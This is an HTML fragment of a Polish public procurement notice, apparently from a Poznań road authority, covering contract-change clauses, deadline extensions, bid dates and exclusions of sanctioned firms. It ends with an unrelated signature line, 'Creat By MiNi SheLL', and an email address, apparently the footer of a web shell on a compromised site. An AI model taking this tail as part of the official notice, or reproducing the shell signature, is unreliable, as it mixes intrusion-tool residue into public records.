w § 10 niniejszej umowy,<br/>2)	zmniejszenie zakresu świadczenia w okolicznościach określonych w § 1 ust. 4 niniejszej umowy i związane z tym zmniejszenie wynagrodzenia określonego w § 6 ust. 1 i ust. 2 pkt 1 niniejszej umowy,<br/>3)	terminu zakończenia wykonania zamówienia; Zamawiający przewiduje możliwość przedłużenia terminów realizacji zamówienia określonych w § 2 ust. 1 niniejszej umowy w przypadku:<br/>a)	działania siły wyższej (np. klęski żywiołowe, strajki generalne lub lokalne), mającej bezpośredni wpływ na terminowość wykonania usług,<br/>b)	wystąpienia warunków atmosferycznych uniemożliwiających wykonanie usług – fakt ten musi być potwierdzony przez osobą nadzorującą z ramienia Zamawiającego,<br/>c)	wystąpienie okoliczności (np.: konieczność wykonania usług dodatkowych, które nie były przewidziane w zestawieniu prac planowanych), których strony umowy nie były w stanie przewidzieć, pomimo zachowania należytej staranności.<br/>d)	działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,<br/>e)	niemożności wykonywania prac z powodu braku dostępności do miejsc niezbędnych do ich wykonania z przyczyn niezawinionych przez Wykonawcę, <br/>f)	niemożności wykonywania prac, gdy uprawniony organ nie dopuszcza do wykonania usług lub nakazują wstrzymanie usług z przyczyn niezawinionych przez Wykonawcę. <br/>g)	wystąpienia niebezpieczeństwa kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia lub usunięcia tych kolizji.<br/>Powyższe zdarzenia i okoliczności mogące mieć wpływ na przesunięcie terminu należy zgłaszać na bieżąco (tj. w dniu ich wystąpienia) Zamawiającemu w formie pisemnej (dopuszcza się wysłanie informacji drogą elektroniczną, potwierdzonej formą pisemną nie później niż następnego dnia roboczego).<br/>W sytuacjach przedstawionych w ust. 2 pkt 3 niniejszego paragrafu, w przypadkach wystąpienia opóźnień lub wstrzymania realizacji, strony mogą ustalić nowe terminy realizacji, z tym że maksymalny okres przesunięcia terminu zakończenia równy będzie okresowi przerwy, postoju lub okresowi niezbędnemu do wykonania usług nieprzewidzianych w § 1 ust. 2 niniejszej umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-03 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/zdp_poznan</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-03 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-02</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 1.	Zamawiający wymaga aby zamówienie zostało wykonane w terminie:<br/>1) Zamówienie podstawowe – Wykonawca ma obowiązek rozpocząć wykonywanie usług w ciągu 3 dni i zakończyć nie później niż w ciągu 25 dni licząc od dnia zgłoszenia przez Zamawiającego potrzeby ich wykonania, zawierającego szczegółowy zakres prac wraz z lokalizacją, przy czym zamówienie podstawowe należy wykonać nie później niż do 30 czerwca 2023 roku,<br/>2) opcja nr 1 - Wykonawca ma obowiązek rozpocząć wykonywanie usług w ciągu 3 dni i zakończyć nie później niż w terminie do 25 dni licząc od dnia zgłoszenia przez Zamawiającego potrzeby ich wykonania, zawierającego szczegółowy zakres prac wraz z lokalizacją, przy czym Zamawiający w ww. zgłoszeniu określi każdorazowo ostateczny termin zakończenia prac nim objętych proporcjonalnie do zleconego do realizacji zakresu usług, opcję nr 1 należy wykonać nie później niż do 30 września 2023 roku,<br/>3) opcja nr 2 - Wykonawca ma obowiązek rozpocząć wykonywanie usług w ciągu 3 dni i zakończyć nie później niż w ciągu 10 dni licząc od dnia zgłoszenia przez Zamawiającego potrzeby ich wykonania, zawierającego szczegółowy zakres prac wraz z lokalizacją, przy czym opcję nr 2 należy wykonać nie później niż do 30 września 2023 roku.<br/>Z postępowania o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia 11 września 2019 r. –<br/>Prawo zamówień publicznych wyklucza się:<br/>1) wykonawcę wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo<br/>wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w<br/>art. 1 pkt 3 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji<br/>na Ukrainę oraz służących ochronie bezpieczeństwa narodowego;<br/>2) wykonawcę, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu<br/>pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593, 655, 835, 2180 i 2185) jest osoba wymieniona w<br/>wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim<br/>beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu<br/>na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 Ustawy z dnia 13 kwietnia 2022 r. o<br/>szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie<br/>bezpieczeństwa narodowego;<br/>3) wykonawcę, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o<br/>rachunkowości (Dz. U. z 2021 r. poz. 217, 2105 i 2106 oraz z 2022 r. poz. 1488) jest podmiot wymieniony w wykazach<br/>określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką<br/>dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę<br/>rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 Ustawy z dnia 13 kwietnia 2022 r. o szczególnych<br/>rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa<br/>narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com